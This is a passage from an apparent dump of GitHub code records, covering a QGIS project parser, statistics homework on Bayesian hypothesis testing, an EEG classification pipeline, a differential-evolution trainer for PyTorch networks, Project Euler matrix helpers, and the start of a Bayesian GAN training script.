nodes.at(index).toElement()\n\n\nclass Project(object):\n def __init__(self, xmldoc):\n self.doc = xmldoc\n self._maplayers = None\n\n @classmethod\n def fromFile(cls, filename):\n QDir.setCurrent(os.path.dirname(filename))\n fileinfo = QFileInfo(filename)\n QgsProject.instance().read(fileinfo)\n xml = open(filename).read()\n doc = QDomDocument()\n doc.setContent(xml)\n return cls(doc)\n\n def _createLayer(self, node):\n type = node.attribute('type')\n if type == \"vector\":\n layer = QgsVectorLayer()\n elif type == \"raster\":\n layer = QgsRasterLayer()\n else:\n return None\n layer.readLayerXML(node)\n return layer\n\n def _getLayer(self, node):\n filelist = node.elementsByTagName(\"legendlayerfile\")\n layerfile = filelist.at(0).toElement()\n layerid = layerfile.attribute('layerid')\n visible = int(layerfile.attribute('visible'))\n return layerid, bool(visible)\n\n def maplayers(self):\n return QgsMapLayerRegistry.instance().mapLayers().values()\n\n def legendlayers(self):\n legendnodes = self.doc.elementsByTagName(\"legendlayer\")\n layers = OrderedDict()\n for elm in iternodes(legendnodes):\n layerid, visible = self._getLayer(elm)\n layers[layerid] = visible\n return layers\n\n def settings(self):\n \"\"\"\n Return the settings that have been set for the map canvas.\n @return: A QgsMapSettings instance with the settings read from the project.\n \"\"\"\n canvasnodes = self.doc.elementsByTagName(\"mapcanvas\")\n node = canvasnodes.at(0).toElement()\n settings = QgsMapSettings()\n settings.readXML(node)\n return settings\n\n def visiblelayers(self):\n # Filter out only the ones we can see.\n visible = [layerid for layerid, visible in self.legendlayers().iteritems() if visible]\n return [layer_by_id(layerid) for layerid in visible]\n","repo_name":"NathanW2/qgis2img","sub_path":"qgis2img/projectparser.py","file_name":"projectparser.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"37236627056","text":"# Statistische Muserekennung WS 2023\n# Benjamin Stifter, 01618881\n# Olivia Panzenböck, 11775488\n\nimport numpy as np\nfrom scipy import stats\nimport matplotlib.pyplot as plt\nimport scipy.integrate as integrate\n\n\n# Aufgabe3\n\ndef dichte(x, mu, std):\n p_x=[]\n for i in x:\n p_x1 = 1/(np.sqrt(2*np.pi)*std) * np.exp(-np.power(i-mu,2)/(2*np.power(std,2))) # S. 
237\n p_x.append(p_x1)\n return p_x\n\ndef rand(x, p_x_mu, p_mu, p_x_mu2, p_mu2 ):\n p_x=[]\n for i in range(len(x)):\n p_x1=p_x_mu[i] * p_mu +p_x_mu2[i] * p_mu2\n p_x.append(p_x1)\n return p_x\n\n return\n\ndef posterior(x, p_x_mu, p_mu, p_x):\n p_mu_x=[]\n for i in range(len(x)):\n p_mu_x1=(p_mu[i] * p_x_mu) / p_x[i]\n p_mu_x.append(p_mu_x1)\n return p_mu_x\n\n# Werte\np_H0 = [0.9, 0.99]\np_H1 = [0.1, 0.01]\nmu_H0 = 4\nstd_H0 = np.sqrt(1)\nmu_H1 = 5\nstd_H1 = np.sqrt(1)\n\n# Aufgabe a)\nx_values=np.linspace(0, 12, 1000)\n\nFalse_P = 1-stats.norm.cdf(x_values, loc=mu_H0, scale=std_H0) # false positive\nTrue_P = 1-stats.norm.cdf(x_values, loc=mu_H1, scale=std_H1) # true positive\n\nVW1=[]\nVW2=[]\nfor i, j in enumerate(x_values):\n a = (True_P[i] * p_H1[0]) / (True_P[i] * p_H1[0] + False_P[i] * p_H0[0])\n b = (True_P[i] * p_H1[1]) / (True_P[i] * p_H1[1] + False_P[i] * p_H0[1])\n VW1.append(a)\n VW2.append(b)\n\n\nplt.figure(figsize=(18, 12))\nplt.plot(x_values, VW1, color='orange', label=r'$H_0$ = 0.9, $H_1$ = 0.1')\nplt.plot(x_values, VW2, color='brown', label=r'$H_0$ = 0.99, $H_1$ = 0.01')\n#plt.title(r'positiven Vorhersagewert als Funktion der Entscheidungsgrenze')\nplt.ylabel(r'$p(H_1|+)$')\nplt.xlabel(r'$x^*$')\nplt.legend()\nplt.grid(True)\nplt.savefig('plots/Aufgabe3/a.eps', format='eps')\nplt.show()\n\n\n# Aufgabe b)\npx_H0 = dichte(x_values, mu_H0, std_H0)\npx_H1 = dichte(x_values, mu_H1, std_H1)\npx_9 = rand(x_values, px_H0, p_H0[0], px_H1, p_H1[0])\npx_99 = rand(x_values, px_H0, p_H0[1], px_H1, p_H1[1])\np_H0_x_9 = posterior(x_values,p_H0[0], px_H0, px_9)\np_H1_x_9 = posterior(x_values,p_H1[0], px_H1, px_9)\np_H0_x_99 = posterior(x_values,p_H0[1], px_H0, px_99)\np_H1_x_99 = posterior(x_values,p_H1[1], px_H1, px_99)\n\n# Schnittmenge finden\nround1 = [round(zahl, 5) for zahl in p_H0_x_9]\nround2 = [round(zahl, 5) for zahl in p_H1_x_9]\ngemeinsame_elemente = set(round1).intersection(round2)\ngemeinsame_elemente = [x for x in round1 if x in round2]\nprint(list(gemeinsame_elemente))\nP1_err_H0 = 1-stats.norm.cdf(6.7, loc=mu_H0, scale=std_H0)*p_H0[0]\nP2_err_H0 = stats.norm.cdf(6.7, loc=mu_H1, scale=std_H1)*p_H1[0]\nR1 = 1-stats.norm.cdf(9.1, loc=mu_H0, scale=std_H0)*p_H0[1]\nR2 = stats.norm.cdf(9.1, loc=mu_H1, scale=std_H1)*p_H1[1]\n\nBFR_9 = P1_err_H0 + P2_err_H0\nBFR_99 = R1 + R2\n\nprint(BFR_9)\nprint(BFR_99)\n\nplt.figure(figsize=(18, 12))\nplt.plot(x_values, p_H0_x_9, label=r'$H_0$ = 0.9, $H_1$ = 0.1', color='orange')\nplt.plot(x_values, p_H1_x_9, color='orange')\nplt.plot(x_values, p_H0_x_99, color='brown')\nplt.plot(x_values, p_H1_x_99, label=r'$H_0$ = 0.99, $H_1$ = 0.01', color='brown')\nplt.plot([6.7, 6.7], [0, 1], color='k')\nplt.plot([9.1, 9.1], [0, 1], label='Entscheidungsgrenzen', color='k')\nplt.title('Posteriors')\nplt.grid(True)\nplt.ylabel(r'$p(H_i|x)$')\nplt.xlabel(r'$x$')\nplt.legend()\nidx1 = np.argwhere(np.diff(np.sign(np.array(p_H0_x_9) - np.array(p_H1_x_9)))).flatten()\nidx2 = np.argwhere(np.diff(np.sign(np.array(p_H0_x_99) - np.array(p_H1_x_99)))).flatten()\nprint(idx1)\nprint(idx2)\nprint(x_values[514])\nprint(x_values[698])\nplt.savefig('plots/Aufgabe3/b_3.eps', format='eps')\nplt.show()\n\n\n\n# Aufgabe c)\nplt.figure(figsize=(18, 12))\nplt.plot(False_P, True_P, color='green')\n#plt.title(r'ROC-Kurve')\nplt.xlabel(r'$\\alpha$')\nplt.ylabel(r'$1 - \\beta$')\nplt.grid(True)\nplt.savefig('plots/Aufgabe3/c.eps', format='eps')\nplt.show()\n\n\n\n#Test\nplt.figure(figsize=(18, 12))\np_x_H0 = dichte(x_values, mu_H0, std_H0)\np_x_H1 = dichte(x_values, mu_H1, 
std_H1)\nplt.plot(x_values, p_x_H0, label=r'$H_0$ - gesund', color='red', linestyle='--')\nplt.plot(x_values, p_x_H1, label=r'$H_1$ - infiziert', color='blue', linestyle='--')\nplt.plot(x_values, p_H0_x_9, label=r'$H_0$ = 0.9', color='red')\nplt.plot(x_values, p_H1_x_9,label=r'$H_1$ = 0.1', color='blue')\nplt.plot([6.7, 6.7], [0, 1], label='Entscheidungsgrenzen', color='k')\nplt.title(r'Wahrscheinlichkeitsfuntion $H_0$ und $H_1$')\nplt.grid(True)\nplt.ylabel(r'$p(x|H_i)$')\nplt.xlabel(r'$x$')\nplt.legend()\nplt.savefig('plots/Aufgabe3/b_1.eps', format='eps')\nplt.show()\n\n#Test\nplt.figure(figsize=(18, 12))\np_x_H0 = dichte(x_values, mu_H0, std_H0)\np_x_H1 = dichte(x_values, mu_H1, std_H1)\nplt.plot(x_values, p_x_H0, label=r'$H_0$ - gesund',color='red', linestyle='--')\nplt.plot(x_values, p_x_H1, label=r'$H_1$ - infiziert', color='blue', linestyle='--')\nplt.plot(x_values, p_H0_x_99, label=r'$H_0$ = 0.99', color='red')\nplt.plot(x_values, p_H1_x_99,label=r'$H_1$ = 0.01', color='blue')\nplt.plot([9.1, 9.1], [0, 1], label='Entscheidungsgrenzen', color='k')\nplt.title(r'Wahrscheinlichkeitsfuntion $H_0$ und $H_1$')\nplt.grid(True)\nplt.ylabel(r'$p(x|H_i)$')\nplt.xlabel(r'$x$')\nplt.legend()\nplt.savefig('plots/Aufgabe3/b_2.eps', format='eps')\nplt.show()","repo_name":"livi099/Statistische_Mustererkennung_UE","sub_path":"Uebung2/Aufgabe 3 old.py","file_name":"Aufgabe 3 old.py","file_ext":"py","file_size_in_byte":5109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7774565972","text":"\"\"\"\r\nCreated on Wed Feb 14 22:22:09 2018\r\n\r\n@author: Anet\r\nprint(__doc__)\r\n\"\"\"\r\nimport mne\r\nimport numpy as np\r\nfrom mne import io\r\nimport platform; print(platform.platform())\r\nimport sys; print(\"Python\", sys.version)\r\nimport numpy; print(\"NumPy\", numpy.__version__)\r\nimport scipy; print(\"SciPy\", scipy.__version__)\r\nimport sklearn; print(\"Scikit-Learn\", sklearn.__version__)\r\nimport feature as ft\r\nimport lda as lda\r\nimport epochs_methods as epoch_met\r\nimport input_test_data as load_file_names\r\nfrom builtins import print\r\nimport mix_data_x_y as mix\r\nimport config\r\nimport neural_network as neural_network\r\nimport print_results\r\nfrom numpy.random import seed\r\nfrom keras.models import load_model\r\n\r\n\r\nseed(1)\r\n\r\n\r\n#turn off log\r\nmne.set_log_level('ERROR')\r\n# import os\r\n# os.environ[\"TF_CPP_MIN_LOG_LEVEL\"]=\"4\"\r\n\r\n# Set path to raw data folder \r\nDATA_FOLDER ='C:/Users/Anet/eclipse-workspace/Classification/raw_data/'\r\n\r\n\r\n# Set EEG event list - instruction\r\n\r\n\r\n\r\n##############################################\r\n#\r\n# Data loading\r\n#\r\n##############################################\r\n\r\n# mapu, ve ktere jsou ulozeny nazvy trenovacich souboru a jejich targetove/non-targetove znacky\r\nfiles_training_map = load_file_names.load_training_data_names()\r\n\r\n# mapu, ve ktere jsou ulozeny nazvy testovacich souboru a jejich targetove nazvy\r\nfiles_testing_map = load_file_names.load_predicting_data_names()\r\n\r\n\r\n\r\ndata_training_count = len(files_training_map)\r\ndata_predicting_count = len(files_testing_map)\r\n\r\n##############################################\r\n#\r\n# Loading data to train\r\n#\r\n##############################################\r\nraw = []\r\nfor i in range(data_training_count):\r\n path = DATA_FOLDER + (files_training_map[i][0])\r\n raw.append(io.read_raw_brainvision(vhdr_fname=path, preload=True))\r\n 
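The filter call that follows band-passes every raw recording between the configured corner frequencies before epoching. A minimal self-contained sketch of the same MNE call on synthetic data (channel names, sampling rate and cutoffs are illustrative, not taken from this script's config):

import numpy as np
import mne

info = mne.create_info(ch_names=['Cz', 'Pz'], sfreq=250., ch_types='eeg')
raw_demo = mne.io.RawArray(np.random.randn(2, 2500), info)

# Zero-phase FIR band-pass between 1 and 30 Hz, as raw[i].filter(low, high) does.
raw_demo.filter(l_freq=1., h_freq=30.)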
raw[i].filter(config.low_filter_frequency,config.high_filter_frequency)\r\n# print(raw[i]._events)\r\n\r\n##############################################\r\n#\r\n# Loading data to predict\r\n#\r\n##############################################\r\nraw_to_predict = []\r\ntrue_prediction = []\r\nfor i in range(data_predicting_count):\r\n path = DATA_FOLDER + (files_testing_map[i][0])\r\n true_prediction.append(files_testing_map[i][1])\r\n true_prediction[i] = true_prediction[i].strip()\r\n raw_to_predict.append(io.read_raw_brainvision(vhdr_fname=path, preload=True))\r\n raw_to_predict[i].filter(config.low_filter_frequency,config.high_filter_frequency)\r\n\r\n \r\n##############################################\r\n#\r\n# Epochs creating\r\n#\r\n##############################################\r\n \r\n# Vytvori epochy pro klasifikaci\r\nevent_to_predict = []\r\nepochs_to_predict = []\r\nfor i in range(data_predicting_count):\r\n event_to_predict.append(raw_to_predict[i]._events)\r\n \r\n if(i < config.instruction_files_to_pred):\r\n\r\n epochs_to_predict.append(mne.Epochs(raw_to_predict[i],event_to_predict[i], event_id=config.event_id_instruction, tmin=config.epoch_tmin, tmax=config.epoch_tmax,baseline=(config.baseline_min, config.baseline_max), preload=True))\r\n else:\r\n epochs_to_predict.append(mne.Epochs(raw_to_predict[i],event_to_predict[i], event_id=config.event_id_matrix, tmin=config.epoch_tmin, tmax=config.epoch_tmax,baseline=(config.baseline_min, config.baseline_max), preload=True))\r\n \r\n \r\n\r\n# Plot raw data\r\n# raw[0].plot(block=True, lowpass=40, n_channels=5)\r\n\r\n# for i in range(data_count): \r\n# raw[i].plot(block=True, lowpass=40, n_channels=6)\r\n\r\n##############################################\r\n#\r\n# \r\n#\r\n##############################################\r\n\r\n\r\n\r\n\r\n# Set color of events\r\n\"\"\"\r\n\r\n\r\nfor i in range(data_count):\r\n mne.viz.plot_events(events[i],raw[i].info['sfreq'], raw[i].first_samp, color=config.color)\r\n \"\"\"\r\n\r\n#extract epochs\r\n\r\nevents_train = []\r\nepochs = []\r\nepochs_targets = []\r\nepochs_non_targets = []\r\n\r\n\r\n\r\n# Vytvori epochy, z vytvorenych Epoch potom vybere ty targetove a ulozi je do epochs_target\r\n\r\nfor i in range(data_training_count):\r\n events_train.append(raw[i]._events)\r\n \r\n if(i < config.instruction_files_count):\r\n epochs.append(mne.Epochs(raw[i],events_train[i], event_id=config.event_id_instruction, tmin=config.epoch_tmin, tmax=config.epoch_tmax,baseline=(config.baseline_min, config.baseline_max), preload=True))\r\n instruction = 1\r\n else:\r\n epochs.append(mne.Epochs(raw[i],events_train[i], event_id=config.event_id_matrix, tmin=config.epoch_tmin, tmax=config.epoch_tmax,baseline=(config.baseline_min, config.baseline_max), preload=True))\r\n instruction = 0\r\n \r\n epochs_targets.append(epoch_met.filter_epochs_target(epochs[i], events_train[i], files_training_map[i][1], instruction)) \r\n epochs_non_targets.append(epoch_met.filter_epochs_target(epochs[i], events_train[i], files_training_map[i][2], instruction)) \r\n \r\n\r\n\r\n\"\"\"\r\nfor i in range(data_count):\r\n mne.viz.plot_epochs(epochs[i])\r\n\"\"\"\r\n\r\n# epochs.plot(title=\"Events epochs\", n_epochs=(len(epochs.events)),event_colors=color)\r\n# mne.viz.plot_epochs(epochs, title=\"Events epochs\", n_epochs=15,event_colors=color)\r\n\r\n\r\n\r\n# Create evoked structure\r\n\r\nevoked_dict = [[]]\r\n# jen pro instruction\r\nfor i in range(config.instruction_files_count):\r\n evoked_dict.append('')\r\n evoked_dict[i] = 
dict()\r\n for condition in config.conditions:\r\n evoked_dict[i][condition] = epochs[i][condition].average()\r\n \r\n\r\n# Plot chart \r\n\r\n\"\"\"\r\nfor i in range(data_count):\r\n mne.viz.plot_compare_evokeds(evoked_dict[i], title=\"ERP chart\", colors=config.colors, linestyles=config.linestyles, gfp=False)\r\n\"\"\"\r\n\r\n\"\"\"\r\n\r\nExtrakce priznaku\r\n\r\n\"\"\"\r\nlabels = epochs[0].events[:, -1]\r\n\r\n#feature extraction\r\n \r\ntarget_features = []\r\nnon_target_features = []\r\nx = []\r\n\r\n\r\ntest_sample_count = 5\r\n\r\n\r\ny = []\r\n\r\n\r\n# Prepare data to training \r\ntarget_nontarget_epochs = epochs_targets + epochs_non_targets\r\n\r\n\r\nfor i in range(len(target_nontarget_epochs)):\r\n #count of target epochs \r\n for j in range(len(target_nontarget_epochs[i])):\r\n \r\n pick_epochs = target_nontarget_epochs[i][j].pick_channels(config.chan)\r\n x.append(ft.feature_vector(pick_epochs))\r\n if(i < epochs_targets.__len__()):\r\n y.append(1)\r\n else:\r\n y.append(0)\r\n\r\n\r\n# Prepare data to predict \r\nx_pred = []\r\n\r\ny = np.array(y)\r\n\r\nfor i in range(data_predicting_count):\r\n x_pred.append([])\r\n for j in range(len(epochs_to_predict[i])):\r\n pick_epoch_to_predict = epochs_to_predict[i][j].pick_channels(config.chan)\r\n x_pred[i].append(ft.feature_vector(pick_epoch_to_predict))\r\n\r\n\r\n\r\n\r\nmix.mix_data(x, y)\r\n\r\n# X = np.reshape(X,(-1, 100))\r\n\r\n##############################################\r\n#\r\n# Predicting\r\n#\r\n##############################################\r\n\r\n# plotting means of training data\r\n# plt.plot(np.mean(X[y==1], axis=0))\r\n# plt.plot(np.mean(X[y==0], axis=0))\r\n# plt.show()\r\n\r\n\r\n# plotting tests epochs\r\n# for i in range(len(X_pred)):\r\n# name = str(i)+'.png'\r\n# plt.plot(X_pred[i])\r\n# plt.savefig(name)\r\n\r\n\r\n\r\nx_event_lda = []\r\nx_event_neural = []\r\n\r\nprint()\r\nprint(\"If you want to load model from file: 1\")\r\nprint(\"If you want to train new model : 0\")\r\nprint()\r\nmodel_load = input(\"Load model? 1/0: \")\r\nif(model_load == '1'):\r\n config.model = load_model('save_models/mymodel_5.h5') \r\nelse:\r\n if(model_load == '0'):\r\n neural_network.train(x, y)\r\n else:\r\n print(\"Invalid option\")\r\n\r\n\r\nfor i in range(data_predicting_count):\r\n x_event_lda.append(lda.solve(x,y,x_pred[i]))\r\n x_event_neural.append(neural_network.solve(x_pred[i]))\r\n\r\n\r\nfor i in range(data_predicting_count):\r\n print()\r\n print(\"##########################################\")\r\n print()\r\n \r\n \r\n if(i < config.instruction_files_to_pred):\r\n \r\n print(i+1,\".) Expected solve: \",true_prediction[i])\r\n print()\r\n \r\n instruction = 1\r\n print(\"LDA: \")\r\n print_results.print_guess(x_event_lda[i], epochs_to_predict[i], true_prediction[i],instruction)\r\n print(\"Neural network: \")\r\n print_results.print_guess(x_event_neural[i], epochs_to_predict[i], true_prediction[i],instruction)\r\n \r\n else:\r\n if(i%2==1):\r\n print(i+1,\".) 
Expected solve: \",true_prediction[i],true_prediction[i+1])\r\n \r\n print()\r\n \r\n instruction = 0\r\n print(\"LDA: \")\r\n print_results.print_guess(x_event_lda[i], epochs_to_predict[i], true_prediction[i],instruction)\r\n print(\"Neural network: \")\r\n print_results.print_guess(x_event_neural[i], epochs_to_predict[i], true_prediction[i],instruction)\r\n \r\n print()\r\n\r\n\r\n\r\n\r\n","repo_name":"medunova/Classificator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2961502300","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom operator import itemgetter\nfrom datetime import datetime\nimport copy\nimport torch\n\n\nclass DE:\n\n def __init__(self, objective_function, population_function, X, y, Xtest=None, ytest=None, pop_size=50,\n F=0.5, cr=0.5, start_agent=None, use_cuda=False):\n if use_cuda and torch.cuda.is_available:\n self.device = torch.device('cuda')\n print('Using GPU')\n else:\n self.device = torch.device('cpu')\n self.obj = objective_function\n self.X = X.to(self.device)\n self.y = y.long().to(self.device)\n self.N = pop_size\n self.pop_func = population_function\n self.F = torch.Tensor([F]).to(self.device)\n self.cr = torch.Tensor([cr]).to(self.device)\n self.pop = [population_function().to(self.device) for i in range(pop_size)]\n self.testNN = population_function().to(self.device)\n self.testcost = False\n if start_agent is not None:\n self.pop[0] = copy.deepcopy(start_agent)\n if Xtest is not None and ytest is not None:\n self.Xtest = Xtest.to(self.device)\n self.ytest = ytest.long().to(self.device)\n self.testcost = True\n\n def save_model(self, fname, path='../Conv1DModels/', agent=None):\n if agent is None:\n agent = self.best_agent\n torch.save(agent, path+fname)\n\n def load_model(self, fname, path='../Conv1DModels/'):\n return torch.load(path+fname)\n\n def NN_obj(self, agent):\n yhat = agent(self.X)[0].T\n return self.obj(yhat, self.y)\n\n def mutation(self, nets):\n\n for testp, p1, p2, p3 in zip(*[net.parameters() for net in nets]):\n testp.data = p1 + self.F * (p2 - p3)\n\n pass\n\n def crossover(self, target):\n\n for dw, tw in zip(self.testNN.parameters(), target.parameters()):\n crit = torch.rand(dw.shape, device=self.device) < self.cr\n trial_w = crit * dw + ~crit * tw\n dw.data = trial_w\n\n pass\n\n def evolution(self, num_epochs, verbose=False, print_epoch=1000):\n # evaluate the initialized population with the objective function\n obj_all = torch.Tensor([self.NN_obj(agent) for agent in self.pop])\n\n # find the best agent within the initial population\n self.best_agent = self.pop[torch.argmin(obj_all)]\n\n best_obj = torch.min(obj_all)\n prev_obj = best_obj\n\n self.best_objs = np.zeros(num_epochs + 1)\n self.best_objs[0] = best_obj\n\n if self.testcost:\n self.best_test_objs = np.zeros(num_epochs + 1)\n self.best_test_objs[0] = self.obj(self.best_agent(self.Xtest)[0].T, self.ytest)\n\n for i in range(num_epochs):\n for j, x in enumerate(self.pop):\n\n choice = np.random.choice(np.delete(np.arange(self.N), j), 3, replace=False)\n a, b, c = itemgetter(*choice)(self.pop)\n # a, b, c = self.pop[np.random.choice(np.delete(np.arange(self.N), j), 3, replace=False)]\n\n # Mutation\n self.mutation([self.testNN, a, b, c])\n\n # Crossover\n self.crossover(x)\n\n # Selection\n obj_u = self.NN_obj(self.testNN)\n if obj_u < self.NN_obj(x):\n self.pop[j] = copy.deepcopy(self.testNN)\n obj_all[j] = 
obj_u\n\n # update the current best objective function value\n best_obj = torch.min(obj_all)\n self.best_objs[i + 1] = best_obj\n\n if best_obj < prev_obj:\n # update best agent\n self.best_agent = self.pop[torch.argmin(obj_all)]\n # update previous solution to use for next iteration\n prev_obj = best_obj\n\n if self.testcost:\n self.best_test_objs[i + 1] = self.obj(self.best_agent(self.Xtest)[0].T, self.ytest)\n\n if verbose and i % print_epoch == 0:\n # report progress at each iteration\n print('%d: cost= %.5f' % (i, best_obj))\n print('%d: testcost= %.5f' % (i, self.best_test_objs[i + 1]))\n print('%d: acc= %.5f' % (i, self.accuracy(self.best_agent(self.X), self.y)))\n print('%d: testacc= %.5f' % (i, self.accuracy(self.best_agent(self.Xtest), self.ytest)))\n plt.plot(list(self.best_agent.parameters())[0].cpu().detach()[0][0])\n plt.show()\n\n return self.best_agent\n\n def evaluate(self, plot_function=None, agent=None, bounds=None, title=' '):\n\n if agent is None:\n agent = self.best_agent\n plt.figure(figsize=(13, 8))\n plt.plot(range(len(self.best_objs)), self.best_objs)\n plt.plot(range(len(self.best_test_objs)), self.best_test_objs)\n plt.title('Training Graph', fontsize=24)\n plt.xlabel('Iterations', fontsize=20)\n plt.ylabel('Cost', fontsize=20)\n plt.legend(['Train', 'Test'], fontsize=14)\n plt.show()\n\n if plot_function is not None:\n plot_function(agent, self.Xtest, self.ytest, title=title, savefig=False)\n\n print(f\"Best agent is {agent} with a train cost of {np.round(self.NN_obj(agent).cpu().detach(), 5)}.\")\n print(f\"And a test cost of {np.round(self.obj(agent(self.Xtest)[0].T, self.ytest).cpu().detach(), 5)}\")\n\n # print(f\"Worst initialization was {self.initial_worst_agent} with a cost of \\\n # {np.round(self.obj(self.initial_worst_agent), 2)}.\")\n\n pass\n\n def accuracy(self, predictions, ytest):\n predictions = predictions.argmax(axis=1)\n correct_preds = ytest == predictions\n return torch.sum(correct_preds) / len(ytest)\n\n def early_stop_training(self, patience, measure='cost', eval=True, v=True):\n\n n = 1\n iterations = 0\n if measure == 'cost':\n no_iterations_rising = 0\n val_error = 20000\n obj_all = torch.Tensor([self.NN_obj(agent) for agent in self.pop])\n self.opt_agent = copy.deepcopy(self.pop[torch.argmin(obj_all)])\n opt_iterations = iterations\n testcosts = []\n\n while (no_iterations_rising < patience):\n self.evolution(num_epochs=n, verbose=False, print_epoch=1)\n iterations = iterations + n\n val_error_new = self.obj(self.best_agent(self.Xtest)[0].T, self.ytest)\n testcosts.append(val_error_new.item())\n if (val_error_new < val_error):\n if v: print(f\"{iterations}: Test Cost Falling {val_error_new}\")\n no_iterations_rising = 0\n self.opt_agent = copy.deepcopy(self.best_agent)\n opt_iterations = iterations\n val_error = val_error_new\n else:\n no_iterations_rising += n\n\n testcosts = np.array(testcosts)\n if v:\n print(\"Optimal number of iterations:\", opt_iterations)\n print(\"Best error:\", val_error)\n print(\"Error at stop:\", val_error_new)\n\n elif measure == 'accuracy':\n no_iterations_falling = 0\n val_acc = 0\n opt_iterations = iterations\n testcosts = []\n obj_all = torch.Tensor([self.NN_obj(agent) for agent in self.pop])\n self.opt_agent = copy.deepcopy(self.pop[torch.argmin(obj_all)])\n\n while (no_iterations_falling < patience):\n self.evolution(num_epochs=n, verbose=False, print_epoch=1)\n iterations = iterations + n\n val_acc_new = self.accuracy(self.best_agent(self.Xtest), self.ytest)\n testcosts.append(val_acc_new.item())\n 
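The mutation and crossover steps this class applies parameter-tensor by parameter-tensor are the classic DE/rand/1 scheme with binomial crossover. A minimal NumPy sketch of one generation on flat vectors (toy sphere objective, illustrative constants):

import numpy as np

rng = np.random.default_rng(0)
F, CR, N, D = 0.5, 0.5, 20, 4
pop = rng.standard_normal((N, D))
cost = lambda v: np.sum(v ** 2)  # toy objective

for j in range(N):
    a, b, c = pop[rng.choice([i for i in range(N) if i != j], 3, replace=False)]
    donor = a + F * (b - c)               # mutation: DE/rand/1
    mask = rng.random(D) < CR             # binomial crossover
    trial = np.where(mask, donor, pop[j])
    if cost(trial) < cost(pop[j]):        # greedy selection
        pop[j] = trial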
if (val_acc_new > val_acc):\n                    if v: print(f\"{iterations}: Test Accuracy Rising {val_acc_new}\")\n                    no_iterations_falling = 0\n                    self.opt_agent = copy.deepcopy(self.best_agent)\n                    opt_iterations = iterations\n                    val_acc = val_acc_new\n                else:\n                    no_iterations_falling += n\n                    # print(\"Falling or the same\")\n\n            if v:\n                print(\"Optimal number of iterations:\", opt_iterations)\n                print(\"Best accuracy:\", val_acc)\n                print(\"Accuracy at stop:\", val_acc_new)\n\n        if eval:\n            plt.figure(figsize=(13, 8))\n            plt.plot(testcosts)\n            plt.title('Test Cost Graph', fontsize=24)\n            plt.xlabel('Iterations', fontsize=20)\n            plt.ylabel('Test Cost', fontsize=20)\n            plt.show()\n\n        return self.best_agent, self.opt_agent\n\n\n\n\n\n\n","repo_name":"FaxMan1/Master-Thesis","sub_path":"DE_Pytorch.py","file_name":"DE_Pytorch.py","file_ext":"py","file_size_in_byte":8792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31947234242","text":"import sys\n\nresult = {}\nif __name__ == '__main__':\n    for ln in sys.stdin:\n        try:\n            split = ln.split()\n            od = split[0]\n            for idx, val in enumerate(split[3].split(\";\")):\n                if val.split(\":\")[2] == \"1\":\n                    key = od + \"_\" + val.split(\"|\")[0]\n                    if not result.has_key(key):\n                        result[key] = set([])\n                    result[key].add(split[1])\n        except Exception as e:\n            print(\"error:\", e)\n\n    for key, val in result.iteritems():\n        f = open(\"xunfei\" + key, \"a\")\n        for m in val:\n            f.write(m + \"\\n\")\n        f.close()\n","repo_name":"chenfangzhi123/pyDemo","sub_path":"count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25913055736","text":"# common matrix functions for 081, 082 and 083\nfrom dijkstra import Node\n\ndef load_matrix_from_file(filename):\n    matrix = []\n    f = open(filename, \"r\")\n    for line in f:\n        matrix.append([int(x) for x in line.strip().split(\",\")]) \n    f.close()\n    return matrix\n\ndef node_at(nd,x,y,value):\n    key = \"{},{}\".format(x,y)\n    if key in nd:\n        return nd[key]\n    node = Node(value)\n    nd[key] = node\n    return node\n\ndef convert_matrix_to_graph(m,\n    include_right=False,include_left=False,include_down=False,include_up=False):\n    nd = {} # node dictionary, key = \"1,5\" index in matrix\n    all_nodes = []\n    for x,row in enumerate(m):\n        for y,value in enumerate(row):\n            curr = node_at(nd, x, y, value)\n            all_nodes.append(curr)\n            if include_right and y < len(row)-1:\n                right = node_at(nd, x, y+1, m[x][y+1])\n                curr.add_neighbor(right)\n            if include_left and y > 0:\n                left = node_at(nd, x, y-1, m[x][y-1])\n                curr.add_neighbor(left)\n            if include_down and x < len(m)-1:\n                down = node_at(nd, x+1, y, m[x+1][y])\n                curr.add_neighbor(down)\n            if include_up and x > 0:\n                up = node_at(nd, x-1, y, m[x-1][y])\n                curr.add_neighbor(up)\n    return all_nodes\n","repo_name":"MrDeshaies/NOT-projecteuler.net","sub_path":"euler_081_083_matrix.py","file_name":"euler_081_083_matrix.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38063729425","text":"# # Training\n# \n# We show that Bayesian GAN can capture the data distribution by measuring its performance in the semi-supervised setting. We will perform the posterior update as outlined in Algorithm 1 in Saatchi (2017). 
This algorithm can be implemented quite simply by adding noise to standard optimizers such as SGD with momentum and keeping track of the parameters we sample from the posterior. \n\n# ![Posterior Sampling Algorithm](figs/bgan_alg1.png)\n\n# ### SGHMC by Optimizing a Noisy Loss\n# \n# First, observe that the update rules are similar to momentum SGD except for the noise $\\boldsymbol{n}$. In fact, without $\\boldsymbol{n}$, this is equivalent to performing momentum SGD where the loss is $- \\sum_{i=1}^{J_g} \\sum_{k=1}^{J_d} \\log \\text{posterior}$. We will describe the case where $J_g = J_d=1$ for simplicity. \n# \n# We use the main loss $\\mathcal{L} = - \\log p(\\theta | ..)$ and add a noise loss $\\mathcal{L}_\\text{noise} = \\frac{1}{\\eta} \\theta \\cdot \\boldsymbol{n}$ where $\\boldsymbol{n} \\sim \\mathcal{N}(0, 2 \\alpha \\eta I)$ so that optimizing the loss function $\\mathcal{L} + \\mathcal{L}_\\text{noise}$ with momentum SGD is equivalent to performing the SGHMC update step. \n# \n# Below (Equations 3 and 4) are the posterior probabilities, where each error term corresponds to its negative log probability.\n\n# ![Posterior Distributions](figs/posterior_eqs2.png)\n\n#from __future__ import print_function\nimport os, pickle\nimport numpy as np\nimport random, math\nimport torch\nimport torch.nn as 